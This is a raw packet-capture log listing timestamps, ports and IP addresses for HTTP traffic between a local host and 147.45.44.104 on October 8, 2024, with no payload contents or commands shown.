                                                  Oct 8, 2024 03:30:55.573035002 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573050022 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573062897 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573065996 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573081970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573091984 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573100090 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573132992 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573187113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573203087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573218107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573232889 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573235035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573251963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573256969 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573297024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573302031 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573313951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573332071 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573348999 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573364973 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573379040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573388100 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573395967 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573414087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573438883 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573550940 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573565960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573581934 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573596954 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573601961 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573618889 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573632002 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573637009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573654890 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573662996 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573674917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573748112 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573764086 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573780060 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573787928 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573788881 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573796988 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573816061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573826075 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573833942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573852062 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573870897 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573901892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573935986 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573952913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573967934 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573990107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573997021 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574006081 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574023008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574034929 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574040890 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574062109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574069977 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574081898 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574098110 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574105978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574114084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574131966 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574141026 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574172020 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574187040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574194908 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574203968 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574209929 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574254990 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574304104 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574397087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574413061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574429989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574436903 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574446917 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574453115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574470997 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574470997 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574489117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574500084 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574505091 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574526072 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574536085 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574554920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574570894 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574573040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574590921 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574599028 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574614048 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574636936 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574644089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574657917 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574661970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574680090 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574687004 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574696064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574712992 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574723005 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574729919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574748039 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574759960 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574788094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574791908 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574805021 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574851036 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574959040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574975014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574990034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575006008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575020075 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.575022936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575041056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575045109 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.575057030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575074911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575088024 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.575120926 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.575726032 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.662360907 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662420034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662436962 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662452936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662471056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662488937 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662508011 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662507057 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.662507057 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.662579060 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663041115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663058043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663073063 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663100004 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663105965 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663105965 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663116932 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663132906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663147926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663167953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663172007 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663186073 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663188934 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663314104 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663331032 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663346052 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663347960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663366079 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663372040 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663393021 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663408041 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663439989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663456917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663471937 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663487911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663489103 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663513899 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663533926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663548946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663575888 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663575888 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663593054 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663609982 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663619041 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663626909 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663644075 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663657904 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663671970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663691044 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663692951 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663707018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663716078 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663731098 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663744926 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663759947 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663768053 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663777113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663793087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663808107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663819075 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663825989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663841963 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663844109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663861036 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663862944 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663892031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663906097 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663911104 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663929939 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663945913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663953066 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663963079 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663980007 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663981915 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663996935 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664015055 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664020061 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664032936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664057016 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664072037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664089918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664108992 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664110899 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664125919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664143085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664145947 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664160967 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664177895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664180040 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664283037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664299965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664314985 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664314985 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664335012 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664336920 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664351940 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664370060 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664372921 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664386988 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664406061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664407015 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664422989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664446115 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664467096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664480925 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664495945 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664508104 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664513111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664530039 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664535046 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664563894 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664608002 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664623976 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664639950 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664657116 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664664030 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664674997 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664690971 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664691925 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664727926 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664747953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664764881 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664782047 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664798021 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664803982 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664815903 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664832115 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664906979 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664922953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664938927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664954901 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664957047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.664966106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664973021 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664982080 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.664999008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665045977 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665065050 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665067911 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665081978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665107012 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665108919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665126085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665133953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665143013 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665150881 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665164948 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665222883 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665266991 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665283918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665298939 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665313959 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665335894 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665357113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665374041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665388107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665405989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665410042 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665422916 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665441036 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665445089 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665457964 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665474892 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665482044 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665496111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665515900 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665612936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665631056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665647030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665653944 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665664911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665682077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665683985 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665699959 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665719032 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.665725946 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.665751934 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.666028976 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753134966 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753226995 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753243923 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753259897 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753277063 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753294945 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753312111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753354073 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753354073 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753354073 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753526926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753557920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753571033 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753575087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753612041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753623009 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753628969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753647089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753664970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753665924 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753684044 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753706932 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753751040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753767014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753783941 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753797054 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753803015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753825903 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753927946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753971100 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.753971100 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.753990889 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754005909 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754023075 CEST8049730147.45.44.104192.168.2.4
